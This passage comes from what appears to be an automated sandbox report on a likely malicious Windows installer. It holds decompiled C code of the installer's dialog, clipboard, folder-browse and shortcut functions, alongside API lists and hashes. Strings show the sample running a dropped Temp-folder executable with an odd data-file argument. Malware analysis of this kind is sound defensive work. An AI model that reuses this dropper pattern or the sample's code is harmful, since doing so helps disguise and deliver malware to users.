                            									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                            								} while (_a4 != _t156);
                            								OpenClipboard(_t156);
                            								EmptyClipboard();
                            								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                            								_a4 = _t108;
                            								_t172 = GlobalLock(_t108);
                            								do {
                            									_v48 = _t172;
                            									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                            									 *_t173 = 0xd;
                            									_t175 = _t173 + 2;
                            									 *_t175 = 0xa;
                            									_t172 = _t175 + 2;
                            									_t156 = _t156 + 1;
                            								} while (_t156 < _a8);
                            								GlobalUnlock(_a4);
                            								SetClipboardData(0xd, _a4);
                            								CloseClipboard();
                            							}
                            							goto L36;
                            						}
                            						if( *0x42922c == _t156) {
                            							ShowWindow( *0x42a268, 8);
                            							if( *0x42a2ec == _t156) {
                            								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
                            							}
                            							E0040459D(_t171);
                            							goto L25;
                            						}
                            						 *0x421f18 = 2;
                            						E0040459D(0x78);
                            						goto L20;
                            					} else {
                            						if(_a12 != 0x403) {
                            							L20:
                            							return E0040462B(_a8, _a12, _a16);
                            						}
                            						ShowWindow( *0x429230, _t156);
                            						ShowWindow(_t169, 8);
                            						E004045F9(_t169);
                            						goto L17;
                            					}
                            				}
                            				_v52 = _v52 | 0xffffffff;
                            				_v40 = _v40 | 0xffffffff;
                            				_t177 = 2;
                            				_v60 = _t177;
                            				_v56 = 0;
                            				_v48 = 0;
                            				_v44 = 0;
                            				asm("stosd");
                            				asm("stosd");
                            				_t130 =  *0x42a270;
                            				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                            				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                            				 *0x429230 = GetDlgItem(_a4, 0x403);
                            				 *0x429228 = GetDlgItem(_a4, 0x3ee);
                            				_t134 = GetDlgItem(_a4, 0x3f8);
                            				 *0x429244 = _t134;
                            				_v8 = _t134;
                            				E004045F9( *0x429230);
                            				 *0x429234 = E00404F52(4);
                            				 *0x42924c = 0;
                            				GetClientRect(_v8,  &_v28);
                            				_v52 = _v28.right - GetSystemMetrics(_t177);
                            				SendMessageW(_v8, 0x1061, 0,  &_v60);
                            				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                            				if(_a8 >= 0) {
                            					SendMessageW(_v8, 0x1001, 0, _a8);
                            					SendMessageW(_v8, 0x1026, 0, _a8);
                            				}
                            				if(_a12 >= _t156) {
                            					SendMessageW(_v8, 0x1024, _t156, _a12);
                            				}
                            				_push( *((intOrPtr*)(_a16 + 0x30)));
                            				_push(0x1b);
                            				E004045C4(_a4);
                            				if(( *0x42a278 & 0x00000003) != 0) {
                            					ShowWindow( *0x429230, _t156);
                            					if(( *0x42a278 & 0x00000002) != 0) {
                            						 *0x429230 = _t156;
                            					} else {
                            						ShowWindow(_v8, 8);
                            					}
                            					E004045F9( *0x429228);
                            				}
                            				_t168 = GetDlgItem(_a4, 0x3ec);
                            				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                            				if(( *0x42a278 & 0x00000004) != 0) {
                            					SendMessageW(_t168, 0x409, _t156, _a12);
                            					SendMessageW(_t168, 0x2001, _t156, _a8);
                            				}
                            				goto L36;
                            			}

                            APIs
                            • GetDlgItem.USER32 ref: 00405867
                            • GetDlgItem.USER32 ref: 00405876
                            • GetClientRect.USER32 ref: 004058B3
                            • GetSystemMetrics.USER32 ref: 004058BA
                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                            • ShowWindow.USER32(?,00000008), ref: 00405956
                            • GetDlgItem.USER32 ref: 00405977
                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                            • GetDlgItem.USER32 ref: 00405885
                              • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                            • GetDlgItem.USER32 ref: 004059C9
                            • CreateThread.KERNEL32 ref: 004059D7
                            • CloseHandle.KERNEL32(00000000), ref: 004059DE
                            • ShowWindow.USER32(00000000), ref: 00405A02
                            • ShowWindow.USER32(?,00000008), ref: 00405A07
                            • ShowWindow.USER32(00000008), ref: 00405A51
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                            • CreatePopupMenu.USER32 ref: 00405A96
                            • AppendMenuW.USER32 ref: 00405AAA
                            • GetWindowRect.USER32 ref: 00405ACA
                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                            • OpenClipboard.USER32(00000000), ref: 00405B2B
                            • EmptyClipboard.USER32 ref: 00405B31
                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                            • GlobalLock.KERNEL32 ref: 00405B47
                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                            • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                            • SetClipboardData.USER32 ref: 00405B86
                            • CloseClipboard.USER32 ref: 00405B8C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                            • String ID: H7B${
                            • API String ID: 590372296-2256286769
                            • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                            • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                            • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                            • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                            				signed int _v8;
                            				signed int _v12;
                            				long _v16;
                            				long _v20;
                            				long _v24;
                            				char _v28;
                            				intOrPtr _v32;
                            				long _v36;
                            				char _v40;
                            				unsigned int _v44;
                            				signed int _v48;
                            				WCHAR* _v56;
                            				intOrPtr _v60;
                            				intOrPtr _v64;
                            				intOrPtr _v68;
                            				WCHAR* _v72;
                            				void _v76;
                            				struct HWND__* _v80;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr _t82;
                            				long _t87;
                            				short* _t89;
                            				void* _t95;
                            				signed int _t96;
                            				int _t109;
                            				signed short _t114;
                            				signed int _t118;
                            				struct HWND__** _t122;
                            				intOrPtr* _t138;
                            				WCHAR* _t146;
                            				unsigned int _t150;
                            				signed int _t152;
                            				unsigned int _t156;
                            				signed int _t158;
                            				signed int* _t159;
                            				signed int* _t160;
                            				struct HWND__* _t166;
                            				struct HWND__* _t167;
                            				int _t169;
                            				unsigned int _t197;
                            
                            				_t156 = __edx;
                            				_t82 =  *0x422720;
                            				_v32 = _t82;
                            				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                            				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                            				if(_a8 == 0x40b) {
                            					E00405CAC(0x3fb, _t146);
                            					E004068EF(_t146);
                            				}
                            				_t167 = _a4;
                            				if(_a8 != 0x110) {
                            					L8:
                            					if(_a8 != 0x111) {
                            						L20:
                            						if(_a8 == 0x40f) {
                            							L22:
                            							_v8 = _v8 & 0x00000000;
                            							_v12 = _v12 & 0x00000000;
                            							E00405CAC(0x3fb, _t146);
                            							if(E0040603F(_t186, _t146) == 0) {
                            								_v8 = 1;
                            							}
                            							E00406668(0x421718, _t146);
                            							_t87 = E00406A35(1);
                            							_v16 = _t87;
                            							if(_t87 == 0) {
                            								L30:
                            								E00406668(0x421718, _t146);
                            								_t89 = E00405FE2(0x421718);
                            								_t158 = 0;
                            								if(_t89 != 0) {
                            									 *_t89 = 0;
                            								}
                            								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                            									goto L35;
                            								} else {
                            									_t169 = 0x400;
                            									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                            									asm("cdq");
                            									_v48 = _t109;
                            									_v44 = _t156;
                            									_v12 = 1;
                            									goto L36;
                            								}
                            							} else {
                            								_t159 = 0;
                            								if(0 == 0x421718) {
                            									goto L30;
                            								} else {
                            									goto L26;
                            								}
                            								while(1) {
                            									L26:
                            									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
                            									if(_t114 != 0) {
                            										break;
                            									}
                            									if(_t159 != 0) {
                            										 *_t159 =  *_t159 & _t114;
                            									}
                            									_t160 = E00405F83(0x421718);
                            									 *_t160 =  *_t160 & 0x00000000;
                            									_t159 = _t160;
                            									 *_t159 = 0x5c;
                            									if(_t159 != 0x421718) {
                            										continue;
                            									} else {
                            										goto L30;
                            									}
                            								}
                            								_t150 = _v44;
                            								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                            								_v44 = _t150 >> 0xa;
                            								_v12 = 1;
                            								_t158 = 0;
                            								__eflags = 0;
                            								L35:
                            								_t169 = 0x400;
                            								L36:
                            								_t95 = E00404F52(5);
                            								if(_v12 != _t158) {
                            									_t197 = _v44;
                            									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                            										_v8 = 2;
                            									}
                            								}
                            								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
                            									E00404F3A(0x3ff, 0xfffffffb, _t95);
                            									if(_v12 == _t158) {
                            										SetDlgItemTextW(_a4, _t169, 0x421708);
                            									} else {
                            										E00404E71(_t169, 0xfffffffc, _v48, _v44);
                            									}
                            								}
                            								_t96 = _v8;
                            								 *0x42a304 = _t96;
                            								if(_t96 == _t158) {
                            									_v8 = E0040140B(7);
                            								}
                            								if(( *(_v32 + 0x14) & _t169) != 0) {
                            									_v8 = _t158;
                            								}
                            								E004045E6(0 | _v8 == _t158);
                            								if(_v8 == _t158 &&  *0x423738 == _t158) {
                            									E00404A0E();
                            								}
                            								 *0x423738 = _t158;
                            								goto L53;
                            							}
                            						}
                            						_t186 = _a8 - 0x405;
                            						if(_a8 != 0x405) {
                            							goto L53;
                            						}
                            						goto L22;
                            					}
                            					_t118 = _a12 & 0x0000ffff;
                            					if(_t118 != 0x3fb) {
                            						L12:
                            						if(_t118 == 0x3e9) {
                            							_t152 = 7;
                            							memset( &_v76, 0, _t152 << 2);
                            							_v80 = _t167;
                            							_v72 = 0x423748;
                            							_v60 = E00404E0B;
                            							_v56 = _t146;
                            							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
                            							_t122 =  &_v80;
                            							_v64 = 0x41;
                            							__imp__SHBrowseForFolderW(_t122);
                            							if(_t122 == 0) {
                            								_a8 = 0x40f;
                            							} else {
                            								__imp__CoTaskMemFree(_t122);
                            								E00405F37(_t146);
                            								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
                            								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\alfons\\AppData\\Local\\Temp") {
                            									E004066A5(_t146, 0x423748, _t167, 0, _t125);
                            									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                            										lstrcatW(_t146, 0x428200);
                            									}
                            								}
                            								 *0x423738 =  *0x423738 + 1;
                            								SetDlgItemTextW(_t167, 0x3fb, _t146);
                            							}
                            						}
                            						goto L20;
                            					}
                            					if(_a12 >> 0x10 != 0x300) {
                            						goto L53;
                            					}
                            					_a8 = 0x40f;
                            					goto L12;
                            				} else {
                            					_t166 = GetDlgItem(_t167, 0x3fb);
                            					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
                            						E00405F37(_t146);
                            					}
                            					 *0x429238 = _t167;
                            					SetWindowTextW(_t166, _t146);
                            					_push( *((intOrPtr*)(_a16 + 0x34)));
                            					_push(1);
                            					E004045C4(_t167);
                            					_push( *((intOrPtr*)(_a16 + 0x30)));
                            					_push(0x14);
                            					E004045C4(_t167);
                            					E004045F9(_t166);
                            					_t138 = E00406A35(8);
                            					if(_t138 == 0) {
                            						L53:
                            						return E0040462B(_a8, _a12, _a16);
                            					} else {
                            						 *_t138(_t166, 1);
                            						goto L8;
                            					}
                            				}
                            			}

                            APIs
                            • GetDlgItem.USER32 ref: 00404B04
                            • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                            • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                            • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                            • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00423748,00000000,?,?), ref: 00404C1C
                            • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq), ref: 00404C28
                            • SetDlgItemTextW.USER32 ref: 00404C3A
                              • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                              • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                              • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                              • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                              • Part of subcall function 004068EF: CharPrevW.USER32(?,?,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                            • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                              • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                              • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                              • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                            • String ID: "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq$A$C:\Users\user\AppData\Local\Temp$H7B
                            • API String ID: 2624150263-1886916216
                            • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                            • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                            • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                            • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 67%
                            			E004021AA() {
                            				signed int _t52;
                            				void* _t56;
                            				intOrPtr* _t60;
                            				intOrPtr _t61;
                            				intOrPtr* _t62;
                            				intOrPtr* _t64;
                            				intOrPtr* _t66;
                            				intOrPtr* _t68;
                            				intOrPtr* _t70;
                            				intOrPtr* _t72;
                            				intOrPtr* _t74;
                            				intOrPtr* _t76;
                            				intOrPtr* _t78;
                            				intOrPtr* _t80;
                            				void* _t83;
                            				intOrPtr* _t91;
                            				signed int _t101;
                            				signed int _t105;
                            				void* _t107;
                            
                            				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                            				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                            				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                            				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                            				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                            				_t52 =  *(_t107 - 0x20);
                            				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                            				_t101 = _t52 & 0x00008000;
                            				_t105 = _t52 >> 0x0000000c & 0x00000007;
                            				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                            				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                            					E00402DA6(0x21);
                            				}
                            				_t56 = _t107 + 8;
                            				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                            				if(_t56 < _t83) {
                            					L14:
                            					 *((intOrPtr*)(_t107 - 4)) = 1;
                            					_push(0xfffffff0);
                            				} else {
                            					_t60 =  *((intOrPtr*)(_t107 + 8));
                            					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                            					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                            					if(_t61 >= _t83) {
                            						_t64 =  *((intOrPtr*)(_t107 + 8));
                            						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                            						if(_t101 == _t83) {
                            							_t80 =  *((intOrPtr*)(_t107 + 8));
                            							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
                            						}
                            						if(_t105 != _t83) {
                            							_t78 =  *((intOrPtr*)(_t107 + 8));
                            							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                            						}
                            						_t66 =  *((intOrPtr*)(_t107 + 8));
                            						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                            						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                            						if( *_t91 != _t83) {
                            							_t76 =  *((intOrPtr*)(_t107 + 8));
                            							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                            						}
                            						_t68 =  *((intOrPtr*)(_t107 + 8));
                            						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                            						_t70 =  *((intOrPtr*)(_t107 + 8));
                            						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                            						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                            							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                            							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                            						}
                            						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                            						 *((intOrPtr*)( *_t72 + 8))(_t72);
                            					}
                            					_t62 =  *((intOrPtr*)(_t107 + 8));
                            					 *((intOrPtr*)( *_t62 + 8))(_t62);
                            					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                            						_push(0xfffffff4);
                            					} else {
                            						goto L14;
                            					}
                            				}
                            				E00401423();
                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                            				return 0;
                            			}

                            APIs
                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CreateInstance
                            • String ID:
                            • API String ID: 542301482-0
                            • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                            • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                            • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                            • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 39%
                            			E0040290B(short __ebx, short* __edi) {
                            				void* _t21;
                            
                            				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                            					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
                            					_push(_t21 - 0x2b0);
                            					_push(__edi);
                            					E00406668();
                            				} else {
                            					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                            					 *__edi = __ebx;
                            					 *((intOrPtr*)(_t21 - 4)) = 1;
                            				}
                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                            				return 0;
                            			}

                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: FileFindFirst
                            • String ID:
                            • API String ID: 1974802433-0
                            • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                            • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                            • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                            • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 96%
                            			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                            				struct HWND__* _v8;
                            				struct HWND__* _v12;
                            				long _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				intOrPtr _v28;
                            				signed char* _v32;
                            				int _v36;
                            				signed int _v44;
                            				int _v48;
                            				signed int* _v60;
                            				signed char* _v64;
                            				signed int _v68;
                            				long _v72;
                            				void* _v76;
                            				intOrPtr _v80;
                            				intOrPtr _v84;
                            				void* _v88;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t198;
                            				intOrPtr _t201;
                            				long _t207;
                            				signed int _t211;
                            				signed int _t222;
                            				void* _t225;
                            				void* _t226;
                            				int _t232;
                            				long _t237;
                            				long _t238;
                            				signed int _t239;
                            				signed int _t245;
                            				signed int _t247;
                            				signed char _t248;
                            				signed char _t254;
                            				void* _t258;
                            				void* _t260;
                            				signed char* _t278;
                            				signed char _t279;
                            				long _t284;
                            				struct HWND__* _t291;
                            				signed int* _t292;
                            				int _t293;
                            				long _t294;
                            				signed int _t295;
                            				void* _t297;
                            				long _t298;
                            				int _t299;
                            				signed int _t300;
                            				signed int _t303;
                            				signed int _t311;
                            				signed char* _t319;
                            				int _t324;
                            				void* _t326;
                            
                            				_t291 = _a4;
                            				_v12 = GetDlgItem(_t291, 0x3f9);
                            				_v8 = GetDlgItem(_t291, 0x408);
                            				_t326 = SendMessageW;
                            				_v24 =  *0x42a288;
                            				_v28 =  *0x42a270 + 0x94;
                            				if(_a8 != 0x110) {
                            					L23:
                            					if(_a8 != 0x405) {
                            						_t301 = _a16;
                            					} else {
                            						_a12 = 0;
                            						_t301 = 1;
                            						_a8 = 0x40f;
                            						_a16 = 1;
                            					}
                            					if(_a8 == 0x4e || _a8 == 0x413) {
                            						_v16 = _t301;
                            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                            							if(( *0x42a279 & 0x00000002) != 0) {
                            								L41:
                            								if(_v16 != 0) {
                            									_t237 = _v16;
                            									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                            										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                            									}
                            									_t238 = _v16;
                            									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                            										_t301 = _v24;
                            										_t239 =  *(_t238 + 0x5c);
                            										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                            											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                            										} else {
                            											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                            										}
                            									}
                            								}
                            								goto L48;
                            							}
                            							if(_a8 == 0x413) {
                            								L33:
                            								_t301 = 0 | _a8 != 0x00000413;
                            								_t245 = E00404F7F(_v8, _a8 != 0x413);
                            								_t295 = _t245;
                            								if(_t295 >= 0) {
                            									_t94 = _v24 + 8; // 0x8
                            									_t301 = _t245 * 0x818 + _t94;
                            									_t247 =  *_t301;
